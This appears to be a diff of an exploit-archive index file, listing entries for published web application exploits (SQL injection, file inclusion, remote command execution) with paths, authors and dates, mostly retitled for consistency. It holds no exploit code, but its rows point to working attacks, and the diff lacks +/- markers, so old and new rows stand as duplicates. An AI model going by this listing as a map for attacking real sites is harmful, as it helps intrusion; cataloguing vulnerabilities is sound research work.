4762,platforms/php/webapps/4762.txt,"nicLOR CMS - 'sezione_news.php' SQL Injection",2007-12-21,x0kster,php,webapps,0
4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 - (output) Remote File Inclusion",2007-12-21,CraCkEr,php,webapps,0
4764,platforms/php/webapps/4764.txt,"Arcadem LE 2.04 - (loadadminpage) Remote File Inclusion",2007-12-21,KnocKout,php,webapps,0
4765,platforms/php/webapps/4765.txt,"1024 CMS 1.3.1 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2007-12-21,irk4z,php,webapps,0
4765,platforms/php/webapps/4765.txt,"1024 CMS 1.3.1 - Local File Inclusion / SQL Injection",2007-12-21,irk4z,php,webapps,0
4766,platforms/php/webapps/4766.txt,"mBlog 1.2 - (page) Remote File Disclosure",2007-12-21,irk4z,php,webapps,0
4767,platforms/php/webapps/4767.txt,"Social Engine 2.0 - Multiple Local File Inclusion",2007-12-21,MhZ91,php,webapps,0
4768,platforms/php/webapps/4768.py,"Shadowed Portal 5.7d3 - Remote Command Execution",2007-12-21,The:Paradox,php,webapps,0
@ -18503,18 +18508,18 @@ id,file,description,date,author,platform,type,port
5391,platforms/php/webapps/5391.php,"Drake CMS 0.4.11 - Blind SQL Injection",2008-04-07,EgiX,php,webapps,0
5392,platforms/php/webapps/5392.php,"LinPHA 1.3.3 Plugin Maps - Remote Command Execution",2008-04-07,EgiX,php,webapps,0
5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - 'root' Parameter Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0
5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - (viewsource.php) Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0
5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - (viewsource.php) File Disclosure",2008-04-07,Stack,php,webapps,0
5400,platforms/php/webapps/5400.txt,"724CMS 4.01 Enterprise - (index.php ID) SQL Injection",2008-04-07,Lidloses_Auge,php,webapps,0
5401,platforms/php/webapps/5401.txt,"My Gaming Ladder 7.5 - (ladderid) SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0
5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - 'viewsource.php' Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0
5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - 'viewsource.php' File Disclosure",2008-04-07,Stack,php,webapps,0
5400,platforms/php/webapps/5400.txt,"724CMS 4.01 Enterprise - 'index.php' SQL Injection",2008-04-07,Lidloses_Auge,php,webapps,0
5401,platforms/php/webapps/5401.txt,"My Gaming Ladder 7.5 - 'ladderid' Parameter SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0
5402,platforms/php/webapps/5402.txt,"iScripts Socialware - 'id' SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0
5404,platforms/php/webapps/5404.php,"phpTournois G4 - Arbitrary File Upload / Code Execution",2008-04-08,"Charles Fol",php,webapps,0
5405,platforms/php/webapps/5405.txt,"exbb 0.22 - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities",2008-04-08,The:Paradox,php,webapps,0
5406,platforms/php/webapps/5406.txt,"Pligg CMS 9.9.0 - (editlink.php id) SQL Injection",2008-04-08,"Guido Landi",php,webapps,0
5405,platforms/php/webapps/5405.txt,"ExBB 0.22 - Local / Remote File Inclusion",2008-04-08,The:Paradox,php,webapps,0
5406,platforms/php/webapps/5406.txt,"Pligg CMS 9.9.0 - 'editlink.php' SQL Injection",2008-04-08,"Guido Landi",php,webapps,0
5407,platforms/php/webapps/5407.php,"FLABER 1.1 RC1 - Remote Command Execution",2008-04-08,EgiX,php,webapps,0
5408,platforms/php/webapps/5408.pl,"LokiCMS 0.3.3 - Remote Command Execution",2008-04-08,girex,php,webapps,0
5409,platforms/asp/webapps/5409.txt,"SuperNET Shop 1.0 - SQL Injection",2008-04-08,U238,asp,webapps,0
5410,platforms/php/webapps/5410.txt,"Prediction Football 1.x - (matchid) SQL Injection",2008-04-08,0in,php,webapps,0
5410,platforms/php/webapps/5410.txt,"Prediction Football 1.x - 'matchid' Parameter SQL Injection",2008-04-08,0in,php,webapps,0
5411,platforms/php/webapps/5411.txt,"Dream4 Koobi Pro 6.25 Links - 'categ' Parameter SQL Injection",2008-04-08,S@BUN,php,webapps,0
5412,platforms/php/webapps/5412.txt,"Dream4 Koobi Pro 6.25 Shop - 'categ' Parameter SQL Injection",2008-04-08,S@BUN,php,webapps,0
5413,platforms/php/webapps/5413.txt,"Dream4 Koobi Pro 6.25 Gallery - 'galid' Parameter SQL Injection",2008-04-08,S@BUN,php,webapps,0
@ -18522,33 +18527,33 @@ id,file,description,date,author,platform,type,port
5415,platforms/php/webapps/5415.txt,"Dream4 Koobi 4.4/5.4 - gallery SQL Injection",2008-04-08,S@BUN,php,webapps,0
5417,platforms/php/webapps/5417.htm,"phpBB Addon Fishing Cat Portal - Remote File Inclusion",2008-04-09,bd0rk,php,webapps,0
5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin",2008-04-09,t0pP8uZz,php,webapps,0
5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - (path) File Disclosure",2008-04-09,JIKO,php,webapps,0
5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - 'path' Parameter File Disclosure",2008-04-09,JIKO,php,webapps,0
5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version - 'file' Remote File Disclosure",2008-04-09,HaCkeR_EgY,php,webapps,0
5421,platforms/php/webapps/5421.txt,"KnowledgeQuest 2.6 - SQL Injection",2008-04-09,"Virangar Security",php,webapps,0
5422,platforms/php/webapps/5422.pl,"LiveCart 1.1.1 - (category id) Blind SQL Injection",2008-04-10,irvian,php,webapps,0
5423,platforms/php/webapps/5423.txt,"Ksemail - 'index.php language' Local File Inclusion",2008-04-10,dun,php,webapps,0
5422,platforms/php/webapps/5422.pl,"LiveCart 1.1.1 - 'id' Parameter Blind SQL Injection",2008-04-10,irvian,php,webapps,0
5423,platforms/php/webapps/5423.txt,"Ksemail - Local File Inclusion",2008-04-10,dun,php,webapps,0
5425,platforms/php/webapps/5425.pl,"LightNEasy 1.2 - (no database) Remote Hash Retrieve Exploit",2008-04-10,girex,php,webapps,0
5426,platforms/php/webapps/5426.txt,"RX Maxsoft - 'popup_img.php fotoID' SQL Injection",2008-04-10,S@BUN,php,webapps,0
5428,platforms/php/webapps/5428.txt,"PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection",2008-04-11,parad0x,php,webapps,0
5426,platforms/php/webapps/5426.txt,"RX Maxsoft - 'fotoID' Parameter SQL Injection",2008-04-10,S@BUN,php,webapps,0
5428,platforms/php/webapps/5428.txt,"PHPKB Knowledge Base Software 1.5 - 'ID' Parameter SQL Injection",2008-04-11,parad0x,php,webapps,0
5429,platforms/php/webapps/5429.txt,"NewsOffice 1.1 - Remote File Inclusion",2008-04-11,RoMaNcYxHaCkEr,php,webapps,0
5431,platforms/php/webapps/5431.txt,"Joomla! Component JoomlaXplorer 1.6.2 - Remote Vulnerabilities",2008-04-11,Houssamix,php,webapps,0
5432,platforms/php/webapps/5432.txt,"PHPAddressBook 2.11 - 'view.php' SQL Injection",2008-04-11,Cr@zy_King,php,webapps,0
5433,platforms/php/webapps/5433.txt,"CcMail 1.0.1 - Insecure Cookie Handling",2008-04-12,t0pP8uZz,php,webapps,0
5434,platforms/php/webapps/5434.pl,"1024 CMS 1.4.2 - Local File Inclusion / Blind SQL Injection",2008-04-13,girex,php,webapps,0
5435,platforms/php/webapps/5435.txt,"Joomla! Component com_extplorer 2.0.0 RC2 - Local Directory Traversal",2008-04-13,Houssamix,php,webapps,0
5436,platforms/php/webapps/5436.txt,"Pollbooth 2.0 - (pollID) SQL Injection",2008-04-13,S@BUN,php,webapps,0
5437,platforms/php/webapps/5437.txt,"cpcommerce 1.1.0 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2008-04-13,BugReport.IR,php,webapps,0
5436,platforms/php/webapps/5436.txt,"Pollbooth 2.0 - 'pollID' Parameter SQL Injection",2008-04-13,S@BUN,php,webapps,0
5437,platforms/php/webapps/5437.txt,"CPCommerce 1.1.0 - Cross-Site Scripting / Local File Inclusion",2008-04-13,BugReport.IR,php,webapps,0
5439,platforms/php/webapps/5439.txt,"PostCard 1.0 - Remote Insecure Cookie Handling",2008-04-13,t0pP8uZz,php,webapps,0
5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 - Blind SQL Injection",2008-04-13,Lidloses_Auge,php,webapps,0
5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS - SQL Injection",2008-04-14,cO2,php,webapps,0
5443,platforms/php/webapps/5443.txt,"SmallBiz eShop - (content_id) SQL Injection",2008-04-14,Stack,php,webapps,0
5443,platforms/php/webapps/5443.txt,"SmallBiz eShop - 'content_id' Parameter SQL Injection",2008-04-14,Stack,php,webapps,0
5444,platforms/php/webapps/5444.txt,"BosClassifieds 3.0 - (index.php cat) SQL Injection",2008-04-14,"SoSo H H",php,webapps,0
5446,platforms/php/webapps/5446.txt,"BosNews 4.0 - (article) SQL Injection",2008-04-14,Crackers_Child,php,webapps,0
5447,platforms/php/webapps/5447.txt,"Dream4 Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple SQL Injections",2008-04-14,JosS,php,webapps,0
5448,platforms/php/webapps/5448.txt,"Dream4 Koobi Pro 6.25 Poll - 'poll_id' Parameter SQL Injection",2008-04-14,S@BUN,php,webapps,0
5449,platforms/php/webapps/5449.php,"KwsPHP - (Upload) Remote Code Execution",2008-04-14,Ajax,php,webapps,0
5450,platforms/php/webapps/5450.txt,"Classifieds Caffe - 'index.php cat_id' SQL Injection",2008-04-15,JosS,php,webapps,0
5452,platforms/php/webapps/5452.txt,"lightneasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0
5452,platforms/php/webapps/5452.txt,"LightNEasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0
5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 - SQL Injection (2)",2008-04-15,cO2,php,webapps,0
5456,platforms/asp/webapps/5456.txt,"carbon communities 2.4 - Multiple Vulnerabilities",2008-04-16,BugReport.IR,asp,webapps,0
5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials 2.1 - 'id' SQL Injection",2008-04-16,cO2,php,webapps,0
@ -18632,7 +18637,7 @@ id,file,description,date,author,platform,type,port
5553,platforms/asp/webapps/5553.txt,"FipsCMS - 'print.asp lg' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0
5554,platforms/php/webapps/5554.php,"Galleristic 1.0 - (index.php cat) SQL Injection",2008-05-07,cOndemned,php,webapps,0
5555,platforms/php/webapps/5555.txt,"gameCMS Lite 1.0 - (index.php systemId) SQL Injection",2008-05-07,InjEctOr5,php,webapps,0
5556,platforms/asp/webapps/5556.txt,"PostcardMentor - 'step1.asp cat_fldAuto' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0
5556,platforms/asp/webapps/5556.txt,"PostcardMentor - 'cat_fldAuto' Parameter SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0
5557,platforms/php/webapps/5557.pl,"OneCMS 2.5 - Blind SQL Injection",2008-05-07,Cod3rZ,php,webapps,0
5558,platforms/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - (Remote File Inclusion / Cross-Site Scripting) Multiple Remote Vulnerabilities",2008-05-07,RoMaNcYxHaCkEr,php,webapps,0
5559,platforms/php/webapps/5559.txt,"EZContents CMS 2.0.0 - Multiple SQL Injections",2008-05-07,"Virangar Security",php,webapps,0
@ -19126,7 +19131,7 @@ id,file,description,date,author,platform,type,port
6143,platforms/php/webapps/6143.txt,"Getacoder clone - (sb_protype) SQL Injection",2008-07-27,"Hussin X",php,webapps,0
6144,platforms/php/webapps/6144.txt,"GC Auction Platinum - (cate_id) SQL Injection",2008-07-27,"Hussin X",php,webapps,0
6145,platforms/php/webapps/6145.txt,"SiteAdmin CMS - (art) SQL Injection",2008-07-27,Cr@zy_King,php,webapps,0
6146,platforms/php/webapps/6146.txt,"Pligg CMS 9.9.0 - (story.php id) SQL Injection",2008-07-28,"Hussin X",php,webapps,0
6146,platforms/php/webapps/6146.txt,"Pligg CMS 9.9.0 - 'story.php' SQL Injection",2008-07-28,"Hussin X",php,webapps,0
6147,platforms/php/webapps/6147.txt,"Youtuber Clone - 'ugroups.php UID' SQL Injection",2008-07-28,"Hussin X",php,webapps,0
6148,platforms/php/webapps/6148.txt,"TalkBack 2.3.5 - 'Language' Local File Inclusion",2008-07-28,NoGe,php,webapps,0
6149,platforms/php/webapps/6149.txt,"Dokeos E-Learning System 1.8.5 - Local File Inclusion",2008-07-28,DSecRG,php,webapps,0
@ -19550,7 +19555,7 @@ id,file,description,date,author,platform,type,port
6737,platforms/php/webapps/6737.txt,"LokiCMS 0.3.4 - 'index.php' Arbitrary Check File Exploit",2008-10-12,JosS,php,webapps,0
6739,platforms/php/webapps/6739.txt,"NewLife Blogger 3.0 - Insecure Cookie Handling / SQL Injection",2008-10-12,Pepelux,php,webapps,0
6740,platforms/php/webapps/6740.txt,"My PHP Indexer 1.0 - 'index.php' Local File Download",2008-10-12,JosS,php,webapps,0
6743,platforms/php/webapps/6743.pl,"LokiCMS 0.3.4 - writeconfig() Remote Command Execution",2008-10-13,girex,php,webapps,0
6743,platforms/php/webapps/6743.pl,"LokiCMS 0.3.4 - 'writeconfig()' Remote Command Execution",2008-10-13,girex,php,webapps,0
6744,platforms/php/webapps/6744.txt,"LokiCMS 0.3.4 - 'admin.php' Create Local File Inclusion",2008-10-13,JosS,php,webapps,0
6745,platforms/php/webapps/6745.txt,"ParsBlogger - 'links.asp id' SQL Injection",2008-10-13,"Hussin X",php,webapps,0
6746,platforms/php/webapps/6746.txt,"IndexScript 3.0 - (sug_cat.php parent_id) SQL Injection",2008-10-13,d3v1l,php,webapps,0
@ -20007,7 +20012,7 @@ id,file,description,date,author,platform,type,port
7304,platforms/php/webapps/7304.pl,"KTP Computer Customer Database CMS 1.0 - Local File Inclusion",2008-11-30,"CWH Underground",php,webapps,0
7305,platforms/php/webapps/7305.txt,"KTP Computer Customer Database CMS 1.0 - Blind SQL Injection",2008-11-30,"CWH Underground",php,webapps,0
7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 - (SQL Injection / Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities",2008-11-30,NoGe,php,webapps,0
7308,platforms/php/webapps/7308.txt,"cpCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass",2008-11-30,girex,php,webapps,0
7308,platforms/php/webapps/7308.txt,"CPCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass",2008-11-30,girex,php,webapps,0
7310,platforms/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusion",2008-11-30,NoGe,php,webapps,0
7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - (edit.php site) SQL Injection",2008-12-01,JIKO,php,webapps,0
7312,platforms/php/webapps/7312.txt,"Andy's PHP KnowledgeBase 0.92.9 - Arbitrary File Upload",2008-12-01,"CWH Underground",php,webapps,0
@ -20739,7 +20744,7 @@ id,file,description,date,author,platform,type,port
8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0
8453,platforms/php/webapps/8453.txt,"webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps,0
8454,platforms/php/webapps/8454.txt,"DNS Tools (PHP Digger) - Remote Command Execution",2009-04-16,SirGod,php,webapps,0
8455,platforms/php/webapps/8455.txt,"cpCommerce 1.2.8 - (id_document) Blind SQL Injection",2009-04-16,NoGe,php,webapps,0
8455,platforms/php/webapps/8455.txt,"CPCommerce 1.2.8 - 'id_document' Parameter Blind SQL Injection",2009-04-16,NoGe,php,webapps,0
8457,platforms/php/webapps/8457.txt,"NetHoteles 3.0 - (ficha.php) SQL Injection",2009-04-16,snakespc,php,webapps,0
8459,platforms/php/webapps/8459.htm,"eLitius 1.0 - (manage-admin.php) Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0
8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion",2009-04-16,JosS,php,webapps,0
@ -20934,7 +20939,7 @@ id,file,description,date,author,platform,type,port
8785,platforms/asp/webapps/8785.txt,"Cute Editor ASP.NET - Remote File Disclosure",2009-05-26,Securitylab.ir,asp,webapps,0
8787,platforms/php/webapps/8787.txt,"MyFirstCMS 1.0.2 - Arbitrary File Delete",2009-05-26,darkjoker,php,webapps,0
8788,platforms/php/webapps/8788.txt,"Mole Adult Portal Script - 'profile.php user_id' SQL Injection",2009-05-26,Qabandi,php,webapps,0
8790,platforms/php/webapps/8790.pl,"cpCommerce 1.2.x - GLOBALS[prefix] Arbitrary File Inclusion",2009-05-26,StAkeR,php,webapps,0
8790,platforms/php/webapps/8790.pl,"CPCommerce 1.2.x - 'GLOBALS[prefix]' Arbitrary File Inclusion",2009-05-26,StAkeR,php,webapps,0
8791,platforms/php/webapps/8791.txt,"WordPress Plugin Lytebox - (wp-lytebox) Local File Inclusion",2009-05-26,TurkGuvenligi,php,webapps,0
8792,platforms/php/webapps/8792.txt,"Webradev Download Protect 1.0 - Remote File Inclusion",2009-05-26,asL-Sabia,php,webapps,0
8793,platforms/php/webapps/8793.txt,"eZoneScripts Hotornot2 Script - (Authentication Bypass) Multiple Remote Vulnerabilities",2009-05-26,"sniper code",php,webapps,0
@ -21429,7 +21434,7 @@ id,file,description,date,author,platform,type,port
9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0
9609,platforms/php/webapps/9609.txt,"Mambo Component 'com_hestar' - SQL Injection",2009-09-09,M3NW5,php,webapps,0
9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - (menu.php) Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0
9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - (cacheId) Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0
9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - 'cacheId' Parameter Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0
9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple Remote File Inclusion",2009-09-10,Kurd-Team,php,webapps,0
9625,platforms/php/webapps/9625.txt,"nullam blog 0.1.2 - (Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-09-10,"Salvatore Fresta",php,webapps,0
9629,platforms/php/webapps/9629.txt,"Graffiti CMS 1.x - Arbitrary File Upload",2009-09-10,"Alexander Concha",php,webapps,0
@ -22922,7 +22927,7 @@ id,file,description,date,author,platform,type,port
12433,platforms/cgi/webapps/12433.py,"NIBE heat pump - Remote Code Execution",2010-04-28,"Jelmer de Hen",cgi,webapps,0
12434,platforms/cgi/webapps/12434.py,"NIBE heat pump - Local File Inclusion",2010-04-28,"Jelmer de Hen",cgi,webapps,0
12435,platforms/php/webapps/12435.txt,"Zabbix 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps,0
12436,platforms/php/webapps/12436.txt,"Pligg CMS 1.0.4 - (story.php?id) SQL Injection",2010-04-28,"Don Tukulesto",php,webapps,0
12436,platforms/php/webapps/12436.txt,"Pligg CMS 1.0.4 - 'story.php' SQL Injection",2010-04-28,"Don Tukulesto",php,webapps,0
12438,platforms/php/webapps/12438.txt,"SoftBizScripts Dating Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0
12439,platforms/php/webapps/12439.txt,"SoftBizScripts Hosting Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0
12440,platforms/php/webapps/12440.txt,"Joomla! Component 'Wap4Joomla' - 'wapmain.php' SQL Injection",2010-04-28,Manas58,php,webapps,0
@ -23002,7 +23007,7 @@ id,file,description,date,author,platform,type,port
12556,platforms/php/webapps/12556.txt,"Tadbir CMS - 'FCKeditor' Arbitrary File Upload",2010-05-10,"Pouya Daneshmand",php,webapps,0
12557,platforms/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0
12558,platforms/php/webapps/12558.txt,"29o3 CMS - (LibDir) Multiple Remote File Inclusion",2010-05-10,eidelweiss,php,webapps,0
12560,platforms/php/webapps/12560.txt,"724CMS 4.59 Enterprise - SQL Injection",2010-05-10,cyberlog,php,webapps,0
12560,platforms/php/webapps/12560.txt,"724CMS Enterprise 4.59 - SQL Injection",2010-05-10,cyberlog,php,webapps,0
12561,platforms/php/webapps/12561.txt,"PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multiple SQL Injections",2010-05-10,R3d-D3V!L,php,webapps,0
12562,platforms/php/webapps/12562.txt,"Waibrasil - Remote File Inclusion / Local File Inclusion",2010-05-10,eXeSoul,php,webapps,0
12563,platforms/php/webapps/12563.txt,"Fiomental & Coolsis Backoffice - Multiple Vulnerabilities",2010-05-10,MasterGipy,php,webapps,0
@ -24220,7 +24225,7 @@ id,file,description,date,author,platform,type,port
15856,platforms/php/webapps/15856.php,"TYPO3 - Unauthenticated Arbitrary File Retrieval",2010-12-29,ikki,php,webapps,0
15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0
15858,platforms/php/webapps/15858.txt,"WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 NS8.1)",2010-12-29,Saif,php,webapps,0
15863,platforms/php/webapps/15863.txt,"lightneasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0
15863,platforms/php/webapps/15863.txt,"LightNEasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0
15864,platforms/php/webapps/15864.txt,"Ignition 1.3 - (page.php) Local File Inclusion",2010-12-30,cOndemned,php,webapps,0
15865,platforms/php/webapps/15865.php,"Ignition 1.3 - Remote Code Execution",2010-12-30,cOndemned,php,webapps,0
15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - Cross-Site Scripting / Remote Code Execution",2011-01-05,mr_me,php,webapps,0
@ -25710,7 +25715,7 @@ id,file,description,date,author,platform,type,port
21552,platforms/php/webapps/21552.txt,"PHP Classifieds 6.0.5 - Cross-Site Scripting",2002-06-14,windows-1256,php,webapps,0
21553,platforms/cgi/webapps/21553.txt,"Mewsoft NetAuction 3.0 - Cross-Site Scripting",2002-06-14,windows-1256,cgi,webapps,0
21557,platforms/php/webapps/21557.txt,"ZeroBoard 4.1 - PHP Include File Arbitrary Command Execution",2002-06-15,onlooker,php,webapps,0
21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 - MagicCard.cgi Arbitrary File Disclosure",2002-06-15,cult,cgi,webapps,0
21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 - 'MagicCard.cgi' Arbitrary File Disclosure",2002-06-15,cult,cgi,webapps,0
21562,platforms/java/webapps/21562.txt,"Wolfram Research webMathematica 4.0 - File Disclosure",2002-06-17,"Andrew Badr",java,webapps,0
21563,platforms/php/webapps/21563.txt,"osCommerce 2.1 - Remote File Inclusion",2002-06-16,"Tim Vandermeerch",php,webapps,0
21564,platforms/php/webapps/21564.txt,"PHP-Address 0.2 e - Remote File Inclusion",2002-06-17,"Tim Vandermeerch",php,webapps,0
@ -26352,7 +26357,7 @@ id,file,description,date,author,platform,type,port
23425,platforms/php/webapps/23425.txt,"MyBB User Profile Skype ID Plugin 1.0 - Persistent Cross-Site Scripting",2012-12-16,limb0,php,webapps,0
23428,platforms/php/webapps/23428.html,"Mambo 4.5 Server - user.php Script Unauthorized Access",2003-12-10,frog,php,webapps,0
23429,platforms/php/webapps/23429.txt,"Mambo Open Source 4.0.14 Server - SQL Injection",2003-12-10,"Chintan Trivedi",php,webapps,0
23430,platforms/php/webapps/23430.txt,"Mambo Open Source 4.0.14 - PollBooth.php Multiple SQL Injection",2003-12-10,frog,php,webapps,0
23430,platforms/php/webapps/23430.txt,"Mambo Open Source 4.0.14 - 'PollBooth.php' Multiple SQL Injection",2003-12-10,frog,php,webapps,0
23432,platforms/cgi/webapps/23432.txt,"RemotelyAnywhere - Default.HTML Logout Message Injection",2003-12-11,"Oliver Karow",cgi,webapps,0
23434,platforms/php/webapps/23434.pl,"osCommerce 2.2 - SQL Injection",2003-12-13,JeiAr,php,webapps,0
23440,platforms/asp/webapps/23440.txt,"elektropost episerver 3/4 - Multiple Vulnerabilities",2003-12-15,babbelbubbel,asp,webapps,0
@ -29144,7 +29149,7 @@ id,file,description,date,author,platform,type,port
27725,platforms/php/webapps/27725.txt,"MKPortal 1.1 - Multiple Input Validation Vulnerabilities",2006-04-22,"Mustafa Can Bjorn IPEKCI",php,webapps,0
27726,platforms/php/webapps/27726.txt,"Simplog 0.9.3 - ImageList.php Cross-Site Scripting",2006-04-22,nukedx,php,webapps,0
27731,platforms/php/webapps/27731.txt,"PhotoKorn 1.53/1.54 - 'index.php' Multiple Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0
27732,platforms/php/webapps/27732.txt,"PhotoKorn 1.53/1.54 - postcard.php id Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0
27732,platforms/php/webapps/27732.txt,"PhotoKorn 1.53/1.54 - 'id' Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0
27733,platforms/php/webapps/27733.txt,"PhotoKorn 1.53/1.54 - print.php cat Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0
27734,platforms/php/webapps/27734.txt,"NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,php,webapps,0
27735,platforms/php/webapps/27735.txt,"PHPWebFTP 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-25,arko.dhar,php,webapps,0
@ -30836,7 +30841,7 @@ id,file,description,date,author,platform,type,port
30097,platforms/php/webapps/30097.txt,"UebiMiau 2.7.10 - demo/pop3/error.php selected_theme Parameter Cross-Site Scripting",2007-05-29,"Michal Majchrowicz",php,webapps,0
30098,platforms/php/webapps/30098.txt,"UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Variable Full Path Disclosure",2007-05-29,"Michal Majchrowicz",php,webapps,0
30099,platforms/php/webapps/30099.txt,"DGNews 2.1 - NewsID Parameter SQL Injection",2007-05-28,"laurent gaffie",php,webapps,0
30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 - Manufacturer.php SQL Injection",2007-05-29,"laurent gaffie",php,webapps,0
30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 - 'manufacturer.php' SQL Injection",2007-05-29,"laurent gaffie",php,webapps,0
30102,platforms/php/webapps/30102.php,"Pheap 2.0 - config.php Pheap_Login Authentication Bypass",2007-05-30,Silentz,php,webapps,0
30103,platforms/php/webapps/30103.txt,"Particle Blogger 1.2.1 - Archives.php SQL Injection",2007-03-16,Serapis.net,php,webapps,0
30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Persistent Cross-Site Scripting in Multiple Parameters",2013-12-11,sajith,php,webapps,0
@ -31307,10 +31312,10 @@ id,file,description,date,author,platform,type,port
30961,platforms/php/webapps/30961.txt,"MatPo.de Kontakt Formular 1.4 - 'function.php' Remote File Inclusion",2007-12-30,bd0rk,php,webapps,0
30962,platforms/php/webapps/30962.txt,"MilliScripts - 'dir.php' Cross-Site Scripting",2007-12-31,"Jose Luis Gangora Fernandez",php,webapps,0
30963,platforms/asp/webapps/30963.txt,"InstantSoftwares Dating Site - Login SQL Injection",2007-12-31,"Aria-Security Team",asp,webapps,0
30964,platforms/php/webapps/30964.txt,"LiveCart 1.0.1 - user/remindPassword return Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0
30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 - category q Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0
30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 - order return Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0
30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 - user/remindComplete email Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0
30964,platforms/php/webapps/30964.txt,"LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0
30965,platforms/php/webapps/30965.txt,"LiveCart 1.0.1 - 'q' Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0
30966,platforms/php/webapps/30966.txt,"LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0
30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 - 'email' Parameter Cross-Site Scripting",2007-12-31,Doz,php,webapps,0
30979,platforms/php/webapps/30979.txt,"WordPress 2.2.3 - 'wp-admin/edit.php' backup Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0
30980,platforms/php/webapps/30980.txt,"AwesomeTemplateEngine 1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0
30981,platforms/php/webapps/30981.txt,"PRO-Search 0.17 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0
